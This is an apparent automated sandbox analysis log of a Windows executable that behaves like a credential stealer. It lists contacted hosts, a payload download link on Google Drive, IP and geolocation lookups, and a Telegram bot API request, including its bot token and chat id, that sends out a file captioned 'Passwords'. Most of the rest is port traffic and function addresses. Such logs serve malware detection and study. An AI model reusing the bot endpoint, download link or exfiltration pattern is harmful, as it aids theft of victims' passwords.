            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d38847f8aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349ED000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A89000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A89000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349ED000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034821000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A89000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: v4nrZtP7K2.exe, 00000005.00000003.2871254472.000000003707A000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2871275238.0000000037085000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2946991850.0000000037086000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: v4nrZtP7K2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349ED000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349BB000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000348E7000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000003FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: v4nrZtP7K2.exe, 00000005.00000002.2923067834.0000000005CB0000.00000004.00001000.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4
            Source: v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4;
            Source: v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004059000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2920114174.000000000404D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=download
            Source: v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=downloadaG
            Source: v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=downloade
            Source: v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=downloadt
            Source: v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004059000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/o
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189ec
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: v4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49740 version: TLS 1.2
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_0040558F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004034A5
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00404DCC1_2_00404DCC
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00406AF21_2_00406AF2
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_6FFB1B5F1_2_6FFB1B5F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_3_3700F1675_3_3700F167
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_00404DCC5_2_00404DCC
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_00406AF25_2_00406AF2
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_000D43285_2_000D4328
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_000D66B85_2_000D66B8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_000D8DA05_2_000D8DA0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_000D5F905_2_000D5F90
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_000D2DD15_2_000D2DD1
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_36947E9A5_2_36947E9A
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694C6385_2_3694C638
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_369476285_2_36947628
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694CCA05_2_3694CCA0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_369403AF5_2_369403AF
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694331A5_2_3694331A
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_369421305_2_36942130
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_36946E915_2_36946E91
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_36946EA05_2_36946EA0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_36947EC65_2_36947EC6
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694DEE15_2_3694DEE1
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694E79E5_2_3694E79E
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694CC8A5_2_3694CC8A
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694B4EC5_2_3694B4EC
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694BD885_2_3694BD88
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694DA895_2_3694DA89
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694EBF65_2_3694EBF6
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694E3395_2_3694E339
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694F0425_2_3694F042
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_369478485_2_36947848
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694B07F5_2_3694B07F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694C1F25_2_3694C1F2
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694B9445_2_3694B944
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376067C05_2_376067C0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376086505_2_37608650
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376096C85_2_376096C8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37609D105_2_37609D10
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760BDF05_2_3760BDF0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760A3605_2_3760A360
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760BA975_2_3760BA97
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760A9B05_2_3760A9B0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376000405_2_37600040
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37603F605_2_37603F60
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37603F705_2_37603F70
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37605F015_2_37605F01
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37605F105_2_37605F10
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760AFF75_2_3760AFF7
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760AFF85_2_3760AFF8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37600FA85_2_37600FA8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376067B05_2_376067B0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376056605_2_37605660
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376086405_2_37608640
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376056505_2_37605650
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37602E105_2_37602E10
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376036C05_2_376036C0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376036B05_2_376036B0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376096B85_2_376096B8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376025605_2_37602560
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376025505_2_37602550
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37609D005_2_37609D00
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37604DA05_2_37604DA0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37604DB05_2_37604DB0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376014005_2_37601400
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37606C095_2_37606C09
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37606C185_2_37606C18
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376074C85_2_376074C8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37601CA05_2_37601CA0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37601CB05_2_37601CB0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376074B85_2_376074B8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376063685_2_37606368
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37607B4F5_2_37607B4F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760A3525_2_3760A352
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376063585_2_37606358
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37603B085_2_37603B08
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37603B185_2_37603B18
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376043C85_2_376043C8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376043B95_2_376043B9
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376032685_2_37603268
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376052065_2_37605206
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376052085_2_37605208
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37605AA85_2_37605AA8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37605AB85_2_37605AB8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760F1305_2_3760F130
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376021085_2_37602108
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3760A9A05_2_3760A9A0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376029A85_2_376029A8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376029B85_2_376029B8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376070615_2_37607061
